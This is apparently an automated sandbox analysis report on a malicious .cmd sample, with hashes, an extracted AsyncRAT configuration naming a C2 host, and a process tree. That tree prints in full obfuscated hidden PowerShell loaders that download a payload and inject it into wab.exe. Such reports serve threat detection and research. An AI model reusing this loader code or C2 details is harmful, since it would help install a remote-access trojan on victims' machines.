Analysis
-
max time kernel
139s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 12:46
Static task
static1
Behavioral task
behavioral1
Sample
cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808.cmd
Resource
win7-20240220-en
General
-
Target
cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808.cmd
-
Size
6KB
-
MD5
ae6a3a8912f6dd675542cc40cb5c6088
-
SHA1
ba9cf3a09d51ab5f090fc9dac6f1253321c922e4
-
SHA256
cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808
-
SHA512
ac34dd4755fa9a5ba35c5c404aea505a5ef26b2ece6dc8f6bc7e65a7fc934e17af60aa208aab74fbf2719086c9e9dd0a1c85548d740967ecce27483e89778699
-
SSDEEP
192:oeOol1MILxFMeVO+BqDwoJK7bE9COaJppuq8TH6+Q/:ocjMIdSHwowbLuqkH6+Q/
Malware Config
Extracted
asyncrat
0.5.7B
Default
dhhj.duckdns.org:8797
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 1996 powershell.exe 7 1996 powershell.exe 9 1996 powershell.exe 11 1996 powershell.exe 13 1996 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2336 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2740 powershell.exe 2336 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2740 set thread context of 2336 2740 powershell.exe wab.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 1996 powershell.exe 2740 powershell.exe 2740 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 2336 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exepowershell.exedescription pid process target process PID 2008 wrote to memory of 1996 2008 cmd.exe powershell.exe PID 2008 wrote to memory of 1996 2008 cmd.exe powershell.exe PID 2008 wrote to memory of 1996 2008 cmd.exe powershell.exe PID 1996 wrote to memory of 2604 1996 powershell.exe cmd.exe PID 1996 wrote to memory of 2604 1996 powershell.exe cmd.exe PID 1996 wrote to memory of 2604 1996 powershell.exe cmd.exe PID 1996 wrote to memory of 2740 1996 powershell.exe powershell.exe PID 1996 wrote to memory of 2740 1996 powershell.exe powershell.exe PID 1996 wrote to memory of 2740 1996 powershell.exe powershell.exe PID 1996 wrote to memory of 2740 1996 powershell.exe powershell.exe PID 2740 wrote to memory of 2796 2740 powershell.exe cmd.exe PID 2740 wrote to memory of 2796 2740 powershell.exe cmd.exe PID 2740 wrote to memory of 2796 2740 powershell.exe cmd.exe PID 2740 wrote to memory of 2796 2740 powershell.exe cmd.exe PID 2740 wrote to memory of 2336 2740 powershell.exe wab.exe PID 2740 wrote to memory of 2336 2740 powershell.exe wab.exe PID 2740 wrote to memory of 2336 2740 powershell.exe wab.exe PID 2740 wrote to memory of 2336 2740 powershell.exe wab.exe PID 2740 wrote to memory of 2336 2740 powershell.exe wab.exe PID 2740 wrote to memory of 2336 2740 powershell.exe wab.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"3⤵PID:2604
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"4⤵PID:2796
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2336
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD54d66c7087bec7fea4218e62ce8db21af
SHA1ad5cbe6dc942e207256dcc0a3e5e9796befa1098
SHA2563d40f5c85fef483a36a0299900264d5ab8c5d89439cba067cee3f7d666d07b35
SHA51255d5d20686414e78930d68ec44c5a5e4f26abc46d56b1cf28a44d2b3bc1e10f1fe33118a76e310c44196007a5b8ec5916913c65d0e469eb84d710ce59fdb076f
-
C:\Users\Admin\AppData\Local\Temp\Tar1FC7.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Bevogtes140.OutFilesize
476KB
MD56a89ec6b007920c37249774d8b8cb1e5
SHA1bc34d0226a45dd3c55a5f42e5e02ece6079f3aee
SHA25609fdf5a6b9e458508dd06389ca3ebbafce89a8d35b539b1a5e131c1d6ff939a7
SHA512a21f562d2d2213fc981c6c08895a4e5e0b6163db49858047f720e19001de667348a630de5bab275d5973480827093da4a06d87d2b198c91336849c5576a15191
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZWX3WCJF3V28QBYSG22.tempFilesize
7KB
MD5da1e9d4e7a59f7bb3ebfd40a62836d62
SHA1508e2d649829116ccf48c56934280c6c76477aa0
SHA2568cfb844c69f4302fdffd95269de6f65bee1804749c5abec1e7b67b6e3519ba61
SHA512cbd40954cb6fe6f27e7039711208e5ebaeb3f08af2ca5667160fed5929cf3e07914105d2b0ce035e2de81c2214b0e225d3fc407e40fb8e0858b1282f20bbaab3
-
memory/1996-6-0x0000000001D10000-0x0000000001D18000-memory.dmpFilesize
32KB
-
memory/1996-5-0x000000001B740000-0x000000001BA22000-memory.dmpFilesize
2.9MB
-
memory/1996-11-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/1996-8-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/1996-7-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/1996-4-0x000007FEF5A6E000-0x000007FEF5A6F000-memory.dmpFilesize
4KB
-
memory/1996-10-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/1996-92-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/1996-9-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/1996-60-0x000007FEF5A6E000-0x000007FEF5A6F000-memory.dmpFilesize
4KB
-
memory/1996-58-0x000007FEF57B0000-0x000007FEF614D000-memory.dmpFilesize
9.6MB
-
memory/2336-79-0x0000000000EE0000-0x0000000001F42000-memory.dmpFilesize
16.4MB
-
memory/2336-91-0x0000000000EE0000-0x0000000001F42000-memory.dmpFilesize
16.4MB
-
memory/2336-93-0x0000000000EE0000-0x0000000000EF2000-memory.dmpFilesize
72KB
-
memory/2740-59-0x0000000006500000-0x000000000A69C000-memory.dmpFilesize
65.6MB